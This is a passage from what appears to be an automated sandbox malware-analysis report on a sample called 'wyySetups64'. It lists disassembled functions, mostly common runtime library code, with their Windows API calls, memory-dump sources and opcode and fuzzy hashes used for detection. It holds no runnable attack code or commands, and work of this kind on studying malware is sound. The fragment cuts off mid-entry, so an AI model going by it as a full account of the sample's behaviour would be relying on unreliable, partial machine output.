                                                                                                                                                                                                              • Opcode Fuzzy Hash: 76c9643fd1df18821398edaab6323fbd9f0414cbbe87c74b2baaec3723e64a7d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1A316D39912721EFEB12EB758C98A57BFA4EB44760B14451AFA10DA2B2E7708089DF40
                                                                                                                                                                                                              Function 00B29A9D Relevance: 6.1, APIs: 4, Instructions: 109COMMONLIBRARYCODE
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4116355062.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_b20000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: __calloc_crt__init_pointers__mtterm
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2478854527-0
                                                                                                                                                                                                              • Opcode ID: 720715378607e4f18366517d453de5e5cb8b5ca67b172311fa18d72390665dd8
                                                                                                                                                                                                              • Instruction ID: fd1695e190700dbd08d139e828bb2e522f0448e333476b1f3184dd008c266bbc
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 720715378607e4f18366517d453de5e5cb8b5ca67b172311fa18d72390665dd8
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 71314C31850E35EAFB21AF74AD887453EE6EB49361B188156E418D7270FB31C481CF50
                                                                                                                                                                                                              Function 00BDE425 Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00BDE459
                                                                                                                                                                                                              • __isleadbyte_l.LIBCMT ref: 00BDE48C
                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000080,00000009,?,?,?,00000000,?,?,?,?), ref: 00BDE4BD
                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,?,?,?), ref: 00BDE52B
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4116723964.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116694335.0000000000BD0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116886071.0000000000BE5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116935852.0000000000BE9000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116976160.0000000000BEF000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4117023604.0000000000BF1000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_bd0000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3058430110-0
                                                                                                                                                                                                              • Opcode ID: 0ad3a66148fbb0acdca7fc405ce80c716ae333206a744410e48f7932bec4bfca
                                                                                                                                                                                                              • Instruction ID: 79973bc289bf2a904860f4bbd4bb97f909176988262e27de7aeb9be4d19a4f24
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0ad3a66148fbb0acdca7fc405ce80c716ae333206a744410e48f7932bec4bfca
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2A318931A01296EFDB21EF64C8909ADBBE1EF01310B1885EAE4759F391E730D940DFA1
                                                                                                                                                                                                              Function 0338A5C2 Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0338A5F6
                                                                                                                                                                                                              • __isleadbyte_l.LIBCMT ref: 0338A629
                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000080,00000009,?,?,?,00000000,?,?,?,?), ref: 0338A65A
                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,?,?,?), ref: 0338A6C8
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3058430110-0
                                                                                                                                                                                                              • Opcode ID: 7860dc174915edbd99ee84fde4280406f851a5b0e3e693991b7925ca5a9e6a51
                                                                                                                                                                                                              • Instruction ID: db4ffa6856558d8eed2326a0f7c17d6fe43fad6188f8bcc50fafeeb085410b80
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7860dc174915edbd99ee84fde4280406f851a5b0e3e693991b7925ca5a9e6a51
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7831AE31A01346EFDF20EF64CCD0AAEBBB9BF01211F1985AAE5918B194D331D990CB50
                                                                                                                                                                                                              Function 03378020 Relevance: 6.1, APIs: 4, Instructions: 91stringCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: lstrlen$_memset
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2425037729-0
                                                                                                                                                                                                              • Opcode ID: aab5bbd6fa4c719ac3ee7145a1150e59ec4bd478714cf508c9409b8abec27d03
                                                                                                                                                                                                              • Instruction ID: fd174e9f6a4add4ce90ee88dc5847b7a29367fabbc276467be8cc428fd432990
                                                                                                                                                                                                              • Opcode Fuzzy Hash: aab5bbd6fa4c719ac3ee7145a1150e59ec4bd478714cf508c9409b8abec27d03
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4421DB76B00208BBCB34DF69DCC69BEB3A9EBC4710B19406DED059B601E73D995186A1
                                                                                                                                                                                                              Function 00BD4380 Relevance: 6.1, APIs: 4, Instructions: 70networkCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SetLastError.KERNEL32(0000139F), ref: 00BD43EC
                                                                                                                                                                                                                • Part of subcall function 00BD13A0: HeapAlloc.KERNEL32(00000000,00000000,?,?,?,?), ref: 00BD13CB
                                                                                                                                                                                                                • Part of subcall function 00BD4C50: HeapFree.KERNEL32(?,00000000,?,00000000,00BD4E35,?,00BD42C8,00BD4E35,00000000,?,?,00BD4E35,?), ref: 00BD4C77
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000,?), ref: 00BD43D7
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000057), ref: 00BD4401
                                                                                                                                                                                                              • WSAGetLastError.WS2_32(?), ref: 00BD4410
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4116723964.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116694335.0000000000BD0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116886071.0000000000BE5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116935852.0000000000BE9000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116976160.0000000000BEF000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4117023604.0000000000BF1000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_bd0000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorLast$Heap$AllocFree
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1906775185-0
                                                                                                                                                                                                              • Opcode ID: 16fa47560858cd513b95d7a7a0876a1d087168085c2680b65fa13d4e2c5c23bf
                                                                                                                                                                                                              • Instruction ID: 13d9cb7afea889b4a8935efb64a56a6b0bce1e480f95035c377c0193f2c1459a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 16fa47560858cd513b95d7a7a0876a1d087168085c2680b65fa13d4e2c5c23bf
                                                                                                                                                                                                              • Instruction Fuzzy Hash: DB115136A05518AB8720EFA9B8845EEF7E8EB84332B0445FBFD09D7301EB359D1146D5
                                                                                                                                                                                                              Function 03374380 Relevance: 6.1, APIs: 4, Instructions: 70networkCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SetLastError.KERNEL32(0000139F), ref: 033743EC
                                                                                                                                                                                                                • Part of subcall function 033713A0: HeapAlloc.KERNEL32(00000000,00000000,?,?,?,?), ref: 033713CB
                                                                                                                                                                                                                • Part of subcall function 033741E0: EnterCriticalSection.KERNEL32(03374FB5,03374E55,033742BE,00000000,?,?,03374E55,?,?,?,?,00000000,000000FF), ref: 033741E8
                                                                                                                                                                                                                • Part of subcall function 033741E0: LeaveCriticalSection.KERNEL32(03374FB5,?,?,?,00000000,000000FF), ref: 033741F6
                                                                                                                                                                                                                • Part of subcall function 03374C70: HeapFree.KERNEL32(?,00000000,?,00000000,03374E55,?,033742C8,03374E55,00000000,?,?,03374E55,?), ref: 03374C97
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000,?), ref: 033743D7
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000057), ref: 03374401
                                                                                                                                                                                                              • WSAGetLastError.WS2_32(?), ref: 03374410
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorLast$CriticalHeapSection$AllocEnterFreeLeave
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2060118545-0
                                                                                                                                                                                                              • Opcode ID: 18cff66cf8efa7a3e2e910cc815bde2b7f277a6b919e89b8cd23ce0f8261e48d
                                                                                                                                                                                                              • Instruction ID: aa43be61dd617faece93cb2f9355b6b5e2181fb9ed62c14c4c391bd96acfbc9c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 18cff66cf8efa7a3e2e910cc815bde2b7f277a6b919e89b8cd23ce0f8261e48d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E611773AE0551CE79720EF7AF8C459FB7A8EB84322B5845AAEC0CD7200D635991146D0
                                                                                                                                                                                                              Function 0337DE70 Relevance: 6.1, APIs: 4, Instructions: 59memoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _free.LIBCMT ref: 0337DE93
                                                                                                                                                                                                              • _free.LIBCMT ref: 0337DED5
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,0337DC95), ref: 0337DEFC
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 0337DF03
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap_free$FreeProcess
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1072109031-0
                                                                                                                                                                                                              • Opcode ID: e6e9af86d335638c5556b0aba203cf320ca7a357b8cd4b1bc459f6fa65828d07
                                                                                                                                                                                                              • Instruction ID: bf13555f10ef8ae75357341a0b321c32adbd8e2f93e6ef788ff3b2088a5db5a5
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e6e9af86d335638c5556b0aba203cf320ca7a357b8cd4b1bc459f6fa65828d07
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 54114C71600B009BD630DB64CC85F17B3AABF84710F18891CE59A87A90D778F442CB91
                                                                                                                                                                                                              Function 00BD3BF0 Relevance: 6.1, APIs: 4, Instructions: 58networkCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • WSAEventSelect.WS2_32(?,00BD3ABB,00000023), ref: 00BD3C02
                                                                                                                                                                                                              • WSAGetLastError.WS2_32 ref: 00BD3C0D
                                                                                                                                                                                                              • send.WS2_32(?,00000000,00000000,00000000), ref: 00BD3C58
                                                                                                                                                                                                              • WSAGetLastError.WS2_32 ref: 00BD3C63
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4116723964.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116694335.0000000000BD0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116886071.0000000000BE5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116935852.0000000000BE9000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116976160.0000000000BEF000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4117023604.0000000000BF1000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_bd0000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorLast$EventSelectsend
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 259408233-0
                                                                                                                                                                                                              • Opcode ID: 3a5e91bce96a467332f71bf8bb337ada18ec38dc8f6c50f416b6133e7b328257
                                                                                                                                                                                                              • Instruction ID: fc98328f019d9a7072989e5fdabd2e9bd063316ee2fb66a9001bfaa18db3d6a6
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3a5e91bce96a467332f71bf8bb337ada18ec38dc8f6c50f416b6133e7b328257
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C4118CB6610B005BD3308B79DCC8A47B6E9FB88B14F010A2EE557D7791EB31E8008B61
                                                                                                                                                                                                              Function 03373BF0 Relevance: 6.1, APIs: 4, Instructions: 58networkCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • WSAEventSelect.WS2_32(?,03373ABB,00000023), ref: 03373C02
                                                                                                                                                                                                              • WSAGetLastError.WS2_32 ref: 03373C0D
                                                                                                                                                                                                              • send.WS2_32(?,00000000,00000000,00000000), ref: 03373C58
                                                                                                                                                                                                              • WSAGetLastError.WS2_32 ref: 03373C63
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorLast$EventSelectsend
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 259408233-0
                                                                                                                                                                                                              • Opcode ID: a39f6d4730221b297e35787fe6fc5c7d224c87d3b1cae470d725bdeef8e7ae9f
                                                                                                                                                                                                              • Instruction ID: 648dbf4906354e0fe107e2aec1ea5cd0212d50f6d6c0662e484d2de44bff8e7b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a39f6d4730221b297e35787fe6fc5c7d224c87d3b1cae470d725bdeef8e7ae9f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 311121B6610B00ABD730DF79DCC8A57B6EDBB88720F110A2DE656C7650D775E4409B90
                                                                                                                                                                                                              Function 00BDF361 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4116723964.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116694335.0000000000BD0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116886071.0000000000BE5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116935852.0000000000BE9000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116976160.0000000000BEF000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4117023604.0000000000BF1000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_bd0000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3016257755-0
                                                                                                                                                                                                              • Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                                                                                                                                                              • Instruction ID: 4e35d942eeb0135b02514ed3e9bbf44bbebcc004eb602d2d7374b1972ce5b6eb
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3711873600414AFBCF126E84CC41CED7FA3FF08354B598566FA1958230E332C971AB85
                                                                                                                                                                                                              Function 0338BDEB Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3016257755-0
                                                                                                                                                                                                              • Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                                                                                                                                                              • Instruction ID: 767d316afba0ff529dafcf630d2515ea3af18583bc8674d6b17847c05f352b28
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 02118C3640024EBFCF26AF84DC91CEEBF67BF58250B488454FA2858130C736D5B1AB91
                                                                                                                                                                                                              Function 0320B7AA Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4119630030.00000000031F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031F0000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_31f0000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3016257755-0
                                                                                                                                                                                                              • Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                                                                                                                                                              • Instruction ID: 16d1b0ac47b5f40c91b57cb27e67ce868e2f9b990154ce511d8149e62a8898a9
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                                                                                                                                                              • Instruction Fuzzy Hash: AB11807642014EBBCF229F84DC55CEE3F26FB18250F088424FE1858171D336C5B5AB81
                                                                                                                                                                                                              Function 00B2F338 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4116355062.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_b20000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3016257755-0
                                                                                                                                                                                                              • Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                                                                                                                                                              • Instruction ID: 2c7453700ae3641b48d28b2a8939d8f19bc4f6fb23cf5149969b77ec5a828850
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 85116D3200415ABBCF169E84EC51CEE3FB2BF18350B5888A4FE1C58031C636C9B1AB85
                                                                                                                                                                                                              Function 033741E0 Relevance: 6.0, APIs: 4, Instructions: 46COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(03374FB5,03374E55,033742BE,00000000,?,?,03374E55,?,?,?,?,00000000,000000FF), ref: 033741E8
                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(03374FB5,?,?,?,00000000,000000FF), ref: 033741F6
                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(03374FB5), ref: 03374257
                                                                                                                                                                                                              • SetEvent.KERNEL32(8520468B), ref: 03374272
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CriticalSection$Leave$EnterEvent
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3394196147-0
                                                                                                                                                                                                              • Opcode ID: 9bb9d00b3b44ed315699758d7464957a79aaae2da8550008b900916b4c989053
                                                                                                                                                                                                              • Instruction ID: 4d50dd0bc7e5ce7d953a1114d1edae75f90892c1bc4583f1f71409d85f6c2da1
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9bb9d00b3b44ed315699758d7464957a79aaae2da8550008b900916b4c989053
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2011F5B0601B09EFD765CF75D9C4A97B7E9BF48300F15896EE45A8B210EB35E811CB00
                                                                                                                                                                                                              Function 00BD4AE0 Relevance: 6.0, APIs: 4, Instructions: 45timeCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • timeGetTime.WINMM(00000001,?,00000001,?,00BD3C4F,?,?,00000001), ref: 00BD4AF5
                                                                                                                                                                                                              • InterlockedIncrement.KERNEL32(00000001), ref: 00BD4B04
                                                                                                                                                                                                              • InterlockedIncrement.KERNEL32(00000001), ref: 00BD4B11
                                                                                                                                                                                                              • timeGetTime.WINMM(?,00BD3C4F,?,?,00000001), ref: 00BD4B28
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4116723964.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116694335.0000000000BD0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116886071.0000000000BE5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116935852.0000000000BE9000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116976160.0000000000BEF000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4117023604.0000000000BF1000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_bd0000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: IncrementInterlockedTimetime
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 159728177-0
                                                                                                                                                                                                              • Opcode ID: 45e87ad6e8e5482180ac3a07973a39e72ce44e5a5629eca88db6ec3e0e521b96
                                                                                                                                                                                                              • Instruction ID: 90ca490b29e50cc276cd42b04762cd8125fd4689a09007f2f9402e6cac5393c4
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 45e87ad6e8e5482180ac3a07973a39e72ce44e5a5629eca88db6ec3e0e521b96
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5801C8B1600B059FC760DF6AD88094AFBE9AF58750700892AE549C7711E774E6458F90
                                                                                                                                                                                                              Function 03374B00 Relevance: 6.0, APIs: 4, Instructions: 45timeCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • timeGetTime.WINMM(00000001,?,00000001,?,03373C4F,?,?,00000001), ref: 03374B15
                                                                                                                                                                                                              • InterlockedIncrement.KERNEL32(00000001), ref: 03374B24
                                                                                                                                                                                                              • InterlockedIncrement.KERNEL32(00000001), ref: 03374B31
                                                                                                                                                                                                              • timeGetTime.WINMM(?,03373C4F,?,?,00000001), ref: 03374B48
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: IncrementInterlockedTimetime
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 159728177-0
                                                                                                                                                                                                              • Opcode ID: 0e177de0c34a299e184ccf8c18cce01920a14cd3210eac452c8fd401d03b4f07
